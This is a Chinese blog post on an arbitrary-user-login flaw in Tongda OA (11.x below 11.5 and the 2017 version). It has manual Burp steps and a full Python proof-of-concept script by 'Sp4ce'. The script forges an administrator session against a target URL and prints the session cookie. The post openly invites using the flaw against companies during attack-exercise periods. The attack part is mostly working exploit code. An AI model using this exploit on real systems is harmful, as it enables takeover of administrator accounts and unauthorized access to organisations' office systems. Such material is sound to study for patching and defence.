通达OA任意用户登录
正值HW期间,一些企业公司办公系统可能使用通达OA,可以利用此漏洞。
漏洞详情
该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。
影响版本
通达OA 11.x< 11.5 ,2017 版本
手工复现
访问/general/login_code.php,burp抓包,获取UID
访问logincheck_code.php,burp抓包,修改post请求,添加UID
修改:
访问/general/index.php?is_modify_pwd=1,替换cookie,成功登录
poc验证
poc代码如下
'''
@Author : Sp4ce
@Date : 2020-03-17 23:42:16
@LastEditors : Sp4ce
@LastEditTime : 2020-04-22 16:24:52
@Description : Challenge Everything.
'''
import requests
from random import choice
import argparse
import jsonUSER_AGENTS = ["Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)","Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)","Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)","Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)","Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)","Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1","Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0","Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20","Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1","Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11","Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]headers={}def getV11Session(url):checkUrl = url+'/general/login_code.php'try:headers["User-Agent"] = choice(USER_AGENTS)res = requests.get(checkUrl,headers=headers)resText = str(res.text).split('{')codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')getSessUrl = url+'/logincheck_code.php'res = requests.post(getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers)print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])except:print('[-]Something Wrong With '+url)def get2017Session(url):checkUrl = url+'/ispirit/login_code.php'try:headers["User-Agent"] = choice(USER_AGENTS)res = requests.get(checkUrl,headers=headers)resText = json.loads(res.text)codeUid = resText['codeuid']codeScanUrl = url+'/general/login_code_scan.php'res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers)resText = json.loads(res.text)status = resText['status']if status == str(1):getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUidres = requests.get(getCodeUidUrl)print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])else:print('[-]Something Wrong With '+url)except:print('[-]Something Wrong With '+url)if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument("-v","--tdoaversion",type=int,choices=[11, 2017],help="Target TongDa OA Version. e.g: -v 11、-v 2017")parser.add_argument("-url","--targeturl",type=str,help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1")args = parser.parse_args()url = args.targeturlif 'http://' not in url:url = 'http://' + urlif args.tdoaversion == 11:getV11Session(url)elif args.tdoaversion == 2017:get2017Session(url)else:parser.print_help()
通达OA任意用户登录相关推荐
- 通达OA任意用户登录复现(最新)
通达OA任意用户登录复现 0x00 漏洞简介 0x01 影响版本 0x02 环境搭建 0x03 漏洞复现 0x04 修复建议 0x00 漏洞简介 通达OA国内常用的办公系统,使用群体,大小公司都可以, ...
- 通达OA任意用户登录漏洞复现
目录 通达OA任意用户登录漏洞 漏洞描述 影响范围 漏洞复现 通达OA任意用户登录漏洞
- 通达OA任意用户登录复现
1.访问默认管理员后台地址 用户未登录, 弹出如下界面,猜测有通达OA任意用户登录漏洞 2.访问文件https://oaweb.hait.edu.cn//ispirit/login_code.php以 ...
- 通达OA 任意用户登录漏洞复现
0x00 漏洞描述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录. 0x01 影响版本 通达OA < 11.5.200417 版本 通达OA 201 ...
- 通达OA任意用户伪造登录漏洞分析与复现
2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞.未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件 ...
- 通达OA前台任意用户登录漏洞+RCE漏洞复现
声明 本文仅用于技术交流,请勿用于非法用途 由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任. 文章作者拥有对此文章的修改和解释权.如 ...
- 【漏洞复现】通达OA v11.7 在线任意用户登录漏洞
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断. 具体fofa语法放在下面: app="TDX ...
- 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
- 通达OA任意文件上传/文件包含RCE漏洞分析
通达OA任意文件上传/文件包含RCE漏洞分析 0x01 前提 0x01 漏洞介绍 0x02 漏洞分析 首先下载安装 绕过身份验证文件上传部分 变量传递问题 文件包含部分 0x01 前提 关于这个漏洞的 ...
最新文章
- C/C++输入输出函数(I/O)总结
- Python 操作字典 的几个技巧
- 类属性的存储和this指针
- 面试官灵魂拷问:为什么 SQL 语句不要过多的 join?
- GIS二次开发之初探
- 解决Spring自动装配中的循环依赖
- RabbitMQ单机瞎玩(2)
- linux网卡主备,linux网卡bounding的主备模式下上层路由端需要什么设置?
- wireshark协议插件开发--官方文档中文翻译
- Python自然语言处理学习笔记(41):5.2 标注语料库
- 解决问题 “You don‘t have permission to access /index.html on this server.”
- 风口上的“低代码”,是时候来系统学一学了
- matlab读取三级文件夹方式
- HCI实验数据分析之数据可靠性计算,绘制箱图,描述性变量统计,ANOVA,Bonferroni 的连续变量方差分析
- VB2015编写的九宫格拼图游戏及暴力求解解法(主要使用datagridview和listbox控件)
- 优麒麟安装qq (Ubuntu)
- 计算机网络 王道考研2021 第六章:应用层 -- 域名系统 DNS、域名解析
- XGBoost Stopping to Avoid Overfitting(early_stopping_rounds )
- 【深度学习】实验5答案:滴滴出行-交通场景目标检测
- (LeetCode C++)跳跃游戏
热门文章
- bulk es 删除_ES bulk 批量操作
- nrf52832 sdk15.2.0 dfu升级攻略
- 开放式视觉伺服平台源代码_上位机(初步版本,未对细节做修订)
- android xml图片缩放,Android通过自定义ImageView控件实现图片的缩放和拖动的实现代码...
- JavaScript实现在线生成高强度随机密码工具-toolfk程序员在线工具网
- TFT-eSPI 库在 ESP32 上的配置和使用(ESP32 for Arduino)
- 国科大港中文提出带视觉语言验证和迭代推理的Visual Grounding框架,性能SOTA,代码已开源!(CVPR2022)...
- jmeter调整字体大小
- 神兵利器--Cobalt Strike
- Macsome iTunes Converter for Mac(DRM移除和音乐转换器)3.5.0